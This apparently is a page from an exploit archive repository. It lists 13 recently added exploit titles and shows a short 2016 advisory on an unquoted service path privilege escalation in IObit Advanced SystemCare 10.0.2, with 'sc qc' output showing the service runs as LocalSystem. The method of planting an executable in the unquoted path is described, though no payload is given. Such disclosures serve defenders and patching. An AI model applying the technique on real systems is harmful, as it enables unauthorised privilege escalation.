77b46b2163
13 new exploits PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC) PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit PHP FFI Extension 5.0.5 - Local Safe_mode Bypass PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC) PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC) Apple QuickTime < 7.2 - SMIL Remote Integer Overflow Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC) Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow Integramod nederland 1.4.2 - Remote File Inclusion Integramod Nederland 1.4.2 - Remote File Inclusion CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation The Unarchiver 3.11.1 - '.tar.Z' Crash PoC XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation
33 lines
1.5 KiB
Text
Executable file
33 lines
1.5 KiB
Text
Executable file
#########################################################################
|
|
# Exploit Title: IObit Advanced SystemCare Unquoted Service Path Privilege Escalation
|
|
# Date: 19/10/2016
|
|
# Author: Ashiyane Digital Security Team
|
|
# Vendor Homepage: http://www.iobit.com/en/index.php
|
|
# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php#
|
|
# version : 10.0.2 (Latest)
|
|
# Tested on: Windows 7
|
|
##########################################################################
|
|
|
|
IObit Advanced SystemCare installs a service with an unquoted service path
|
|
To properly exploit this vulnerability, the local attacker must insert
|
|
an executable file in the path of the service.
|
|
Upon service restart or system reboot, the malicious code will be run
|
|
with elevated privileges.
|
|
-------------------------------------------
|
|
C:\>sc qc AdvancedSystemCareService10
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: AdvancedSystemCareService10
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
|
|
LOAD_ORDER_GROUP : System Reserved
|
|
TAG : 1
|
|
DISPLAY_NAME : Advanced SystemCare Service 10
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
################################################
|
|
######### Ashiyane Digital Security Team ############
|
|
########## exploit by: Amir.ght #####################
|
|
################################################
|